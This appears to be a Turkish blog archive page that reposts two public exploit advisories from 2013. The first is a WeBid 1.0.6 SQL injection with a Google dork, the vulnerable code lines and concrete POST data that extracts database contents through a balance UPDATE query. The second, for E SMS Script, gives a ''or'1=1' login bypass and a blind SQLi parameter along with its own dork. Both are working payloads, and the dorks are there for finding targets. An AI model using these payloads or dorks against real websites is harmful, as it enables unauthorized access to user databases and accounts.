Archive for 11 Ocak 2013

WeBid 1.0.6 SQL Injection Vulnerability

WeBid 1.0.6 SQL 1.0.6 versiyonunda bulunan SQL injetion açığına ilişkin açıklamalar şu şekilde;

 # Exploit Title: WeBid 1.0.6 SQL Injection Vulnerability
# Google Dork: "Powered by WeBid"
# Date: 1/9/13
# Exploit Author: Life Wasted
# Vendor Homepage:
# Version: Tested on 1.0.6, but could affect other version
# Tested On: Linux, Windows

Vulnerable Code:
Line 53 of the validate.php file
Lines 198 through 202 and 234 in the includes/functions_fees.php file

Proof of Concept:
validate.php?toocheckout=asdf calls the toocheckout_validate() function
toocheckout_validate() takes unsanitized post input from 2 different parameters (total and cart_order_id)
toocheckout_validate() calls callback_process() if the post parameter credit_card_processed is equal to 'Y'
The unsanitized parameters are using in an UPDATE query:
$query = "UPDATE " . $DBPrefix . "users SET balance = balance + " . $payment_amount . $addquery . " WHERE id = " . $custom_id;
This allows an attacker to retrieve data using a time-based blind injection technique or by updating a pre-existing value to the output of an embedded query.

For example, the attacker could send the following post data to extract the name of the current database.
POST DATA: cart_order_id=*Attackers UserID*WEBID1&credit_card_processed=Y&total=1, name=(SELECT database())

The resulting query would be:
UPDATE users SET balance = balance + 1, name=(SELECT database()) WHERE id = *Attackers User ID*

Then the attacker could sign in to their account and view the requested data by going to the edit_data.php page 		 	   		   

E SMS Script Multiple SQL Injection Vulnerabilities

smscollection.php?cat_id= bölümünde blint sql açığı bulunmuş olup, açık sayesinde verilere ulaşılabilmekte

# E SMS Script Multiple SQL Injection Vulnerability
# By cr4wl3r
# Good Music: 🙂
# Script:
# Dork: inurl:"smscollection.php?cat_id="

Proof of concept:

Auth Bypass

  Username: cr4wl3r
  Password: 'or'1=1

Blind SQLi

  http://bastardlabs/smscollection.php?cat_id=[Blind SQLi]